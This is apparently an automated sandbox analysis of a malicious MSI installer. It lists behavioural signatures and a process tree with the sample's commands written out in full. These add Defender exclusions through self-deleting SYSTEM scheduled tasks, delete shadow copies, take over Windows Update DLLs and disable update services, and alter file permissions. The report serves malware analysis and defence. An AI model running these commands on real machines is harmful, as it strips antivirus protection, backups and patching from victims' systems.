Analysis

  • max time kernel
    139s
  • max time network
    148s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    02/08/2026, 10:15

General

  • Target
    install_s0up017.msi
  • Size 7.5MB
  • Sample260802-mac3dszhkf
  • SHA256 886a7a2e6ae3ac9c1159fc4c5b86421df3567c758b40b31687bedd04a637b87a
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Badlisted process makes network request 5 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 30 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Control Panel 4 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_s0up017.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:5256
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4664
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4892
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding ED3ADDFE0EF109EC2FC2908C30E926AF E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:2732
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:2384
  • C:\Users\Public\Jd2xk6\mTQusj.exe
    "C:\Users\Public\Jd2xk6\mTQusj.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:996
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Jd2xk6\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:4180
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\Jd2xk6\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5584
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:2584
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:5072
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:5296
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4472
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:3648
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4964
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:5580
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:5724
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:4784
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:2296
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2548
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1244
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:3100
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:1692
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:1304
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:3412
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1016
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2304
                        • C:\Program Files (x86)\ExivtO\klnsiG.exe
                          "C:\Program Files (x86)\ExivtO\klnsiG.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:296
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2660
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ExivtO" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:1176
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ExivtO" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:1056
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5672
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:1152
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:4472
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ExivtO" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4580
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ExivtO" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:5292
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ExivtO\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            PID:3580
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ExivtO\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5040
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                                PID:1652
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Delete /TN "Task1" /F
                                4⤵
                                  PID:1944
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                3⤵
                                • Executes a command shell one-liner
                                PID:1616
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  4⤵
                                    PID:1972
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      5⤵
                                        PID:6024
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      4⤵
                                      • Launches sc.exe
                                      PID:4716
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc failure wuauserv reset= 0 actions= ""
                                      4⤵
                                      • Launches sc.exe
                                      PID:3220
                                    • C:\Windows\SysWOW64\net.exe
                                      net stop UsoSvc
                                      4⤵
                                        PID:2704
                                        • C:\Windows\SysWOW64\net1.exe
                                          C:\Windows\system32\net1 stop UsoSvc
                                          5⤵
                                            PID:1120
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc config UsoSvc start= disabled
                                          4⤵
                                          • Launches sc.exe
                                          PID:5812
                                        • C:\Windows\SysWOW64\sc.exe
                                          sc failure UsoSvc reset= 0 actions= ""
                                          4⤵
                                          • Launches sc.exe
                                          PID:4772
                                        • C:\Windows\SysWOW64\net.exe
                                          net stop uhssvc
                                          4⤵
                                            PID:2192
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 stop uhssvc
                                              5⤵
                                                PID:3192
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc config uhssvc start= disabled
                                              4⤵
                                              • Launches sc.exe
                                              PID:3092
                                            • C:\Windows\SysWOW64\sc.exe
                                              sc failure uhssvc reset= 0 actions= ""
                                              4⤵
                                              • Launches sc.exe
                                              PID:4512
                                            • C:\Windows\SysWOW64\net.exe
                                              net stop WaaSMedicSvc
                                              4⤵
                                                PID:5744
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                                  5⤵
                                                    PID:2916
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc config WaaSMedicSvc start= disabled
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:2396
                                                • C:\Windows\SysWOW64\sc.exe
                                                  sc failure WaaSMedicSvc reset= 0 actions= ""
                                                  4⤵
                                                  • Launches sc.exe
                                                  PID:5224
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:1884
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:1364
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5204
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5572
                                                • C:\Windows\SysWOW64\takeown.exe
                                                  takeown /f C:\Windows\System32\wuaueng.dll
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5444
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:5988
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2904
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                                  4⤵
                                                  • Possible privilege escalation attempt
                                                  • Modifies file permissions
                                                  PID:2728
                                                • C:\Windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                                  4⤵
                                                    PID:4852
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                    4⤵
                                                      PID:3272
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                      4⤵
                                                        PID:4132
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:1532
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:3304
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4480
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:3412
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1568
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:3548
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:3376
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:3204
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\klnsiG.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:2168
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\image.png" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5708
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\image.png" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5912
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:4632
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5396
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5244
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:6064
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:1896
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:4024
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:1436
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:3288
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:5348
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:6092
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /inheritance:r
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:1948
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /inheritance:r
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1628
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:1392
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:5060
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /c icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                      3⤵
                                                      • Executes a command shell one-liner
                                                      PID:2152
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls "C:\Program Files (x86)\ExivtO\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                                        4⤵
                                                        • Possible privilege escalation attempt
                                                        • Modifies file permissions
                                                        PID:1156
